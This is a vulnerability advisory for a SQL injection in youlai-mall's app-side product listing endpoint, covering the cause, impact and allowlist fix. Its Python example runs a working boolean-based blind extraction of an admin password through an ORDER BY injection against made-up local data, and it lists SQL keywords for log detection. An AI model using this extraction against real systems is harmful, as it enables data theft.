CVE-2026-3287 in youlai-mall

Summary

by MITRE • 02/27/2026

A security flaw has been discovered in youlaitech youlai-mall 2.0.0. It affects the function listPagedSpuForApp in the file mall-pms/pms-boot/src/main/java/com/youlai/mall/pms/controller/app/SpuController.java of the component App-side Product Pagination Endpoint. Manipulating the argument sortField/sort results in SQL injection. The attack can be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.


Analysis

by VulDB Data Team • 03/03/2026

CVE-2026-3287 is a SQL injection flaw in youlaitech youlai-mall 2.0.0, located in the App-side Product Pagination Endpoint. The affected code is the listPagedSpuForApp function in mall-pms/pms-boot/src/main/java/com/youlai/mall/pms/controller/app/SpuController.java, which serves paged product (SPU) listings to the mobile app. The endpoint's sorting parameters are used without being validated first.

The root cause is that the sortField and sort request arguments are placed into the query's ORDER BY clause as-is. Column names and sort directions cannot be bound as prepared-statement parameters, so the only safe way to build a dynamic ORDER BY is to map each request value onto a fixed allowlist of column identifiers and the two directions ASC and DESC, and to reject anything else; the affected code does not do this. The weakness is classified as CWE-89 (improper neutralization of special elements used in an SQL command). Because the parameters travel in ordinary HTTP requests to a customer-facing endpoint, the flaw is reachable remotely, as the summary states.

Attackers can craft requests with manipulated sortField and sort values to inject SQL into the backend query. Injection into an ORDER BY clause usually does not permit stacking a second statement unless the JDBC driver has multi-statement execution enabled, but it does permit blind extraction: a sort expression whose ordering depends on a subquery condition, or one that introduces a time delay, leaks the contents of any table the application's database account can read, one bit per request. The public availability of an exploit means no reconnaissance or deep skill is needed to reproduce the attack. The vendor did not respond to early disclosure, so no official patch or mitigation guidance was available when the advisory was published.

Successful exploitation can expose customer and order data, product and pricing records, and, depending on what the database account can reach, credentials or other tables that the shop's own code never returns to the app. For an e-commerce deployment this translates into financial loss, reputational damage, and regulatory exposure. Until a fixed release is available, operators should patch the endpoint themselves so that sortField is resolved through an allowlist of permitted column names and sort is restricted to ASC/DESC, with any other value rejected; restrict network access to the app-side API where possible; and run the application's database account with the minimum privileges the shop needs, so that a successful injection cannot read unrelated tables. A quick check for past abuse is to search access logs for sortField or sort values that contain quotes, parentheses, or SQL keywords such as CASE, SELECT, or SLEEP; legitimate clients only ever send a handful of fixed column names.
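To make the mechanism described above concrete (the ORDER BY injection through the sort parameters, and the allowlist fix), here is an added Python example. It is not youlai-mall code (the project is written in Java) and not part of the VulDB advisory. It builds an in-memory SQLite database with constructed product and user rows, shows a listing function that pastes sortField/sort into ORDER BY the way the advisory describes, drives a boolean-based blind extraction through the resulting change in row order, and then shows the allowlisted version that refuses the same payload. The table and column names (pms_spu, sys_user, price, sales), the sample rows, and all function names are assumptions chosen for the illustration.

```python
import sqlite3

# Constructed sample data standing in for the product table the paged SPU
# endpoint reads, plus a second table the endpoint should never expose.
# Table and column names are assumptions, not youlai-mall's real schema.
SAMPLE_SCHEMA = """
CREATE TABLE pms_spu (id INTEGER PRIMARY KEY, name TEXT, price REAL, sales INTEGER, status INTEGER);
INSERT INTO pms_spu VALUES (1, 'zebra mug', 5.0, 40, 1);
INSERT INTO pms_spu VALUES (2, 'apple tee', 20.0, 10, 1);
INSERT INTO pms_spu VALUES (3, 'mango hat', 12.0, 25, 1);
CREATE TABLE sys_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO sys_user VALUES (1, 'admin', 's3cr3t');
"""


def build_sample_db():
    """Return an in-memory SQLite database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def list_spu_vulnerable(conn, sort_field, sort):
    """The flawed pattern: sortField/sort pasted straight into ORDER BY."""
    sql = (
        "SELECT id, name, price FROM pms_spu WHERE status = 1 "
        f"ORDER BY {sort_field} {sort}"
    )
    return conn.execute(sql).fetchall()


# --- attacker side: boolean-based blind extraction through the sort order ---

def oracle_probe(conn, condition_sql):
    """Submit a sortField whose ordering depends on condition_sql being true.

    When the condition holds, rows come back sorted by price; otherwise by
    name. The two orders differ for the sample rows, so the response order
    leaks one bit about data in any table the DB account can read.
    """
    payload = f"(CASE WHEN ({condition_sql}) THEN price ELSE name END)"
    rows = list_spu_vulnerable(conn, payload, "ASC")
    return rows == sorted(rows, key=lambda r: r[2])


def extract_admin_password(conn, charset="abcdefghijklmnopqrstuvwxyz0123456789", max_len=32):
    """Recover sys_user.password for 'admin' one character at a time."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = (
                "(SELECT substr(password, %d, 1) FROM sys_user "
                "WHERE username = 'admin') = '%s'" % (pos, ch)
            )
            if oracle_probe(conn, cond):
                recovered += ch
                break
        else:
            break  # no character matched: we ran past the end of the value
    return recovered


# --- defender side: allowlist mapping instead of trusting the raw input ---

ALLOWED_SORT_FIELDS = {"price": "price", "sales": "sales", "id": "id"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def safe_order_by(sort_field, sort):
    """Map request values to a fixed ORDER BY fragment, or None if not allowed."""
    column = ALLOWED_SORT_FIELDS.get(sort_field)
    direction = ALLOWED_DIRECTIONS.get((sort or "asc").lower())
    if column is None or direction is None:
        return None
    return f"ORDER BY {column} {direction}"


def list_spu_hardened(conn, sort_field, sort):
    """Same query, but only allowlisted identifiers ever reach the SQL text."""
    order_by = safe_order_by(sort_field, sort)
    if order_by is None:
        raise ValueError("unsupported sortField/sort value")
    sql = f"SELECT id, name, price FROM pms_spu WHERE status = 1 {order_by}"
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = build_sample_db()
    print("leaked via vulnerable endpoint:", extract_admin_password(db))
    print("hardened, price desc:", list_spu_hardened(db, "price", "desc"))
    try:
        list_spu_hardened(db, "(CASE WHEN 1=1 THEN price ELSE name END)", "asc")
    except ValueError as exc:
        print("hardened rejected payload:", exc)
```

The point of the allowlist is that the request value is never copied into the SQL text; it is only used as a dictionary key, so an attacker can choose which of the permitted columns is used but cannot introduce an expression, a subquery, or a second statement. The same approach carries over directly to a Java controller backed by MyBatis or JDBC, where an ORDER BY column likewise cannot be supplied as a bound parameter.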

This is a textbook SQL injection vector, and the fix is equally standard: bind data values as prepared-statement parameters, resolve identifiers such as sort columns through an allowlist, and keep the database account's privileges to the minimum the application needs. Teams running youlai-mall, or any application that accepts a sort column from the client, should review their code for the same pattern and add automated injection testing to their pipeline. The lack of any vendor reply to the disclosure also shows why operators need their own mitigation plan rather than relying on a timely upstream fix.

Responsible

VulDB

Disclosure

02/27/2026

Moderation

accepted

CPE

ready

Exploit

public

EPSS

0.00013

KEV

no

Activities

very low
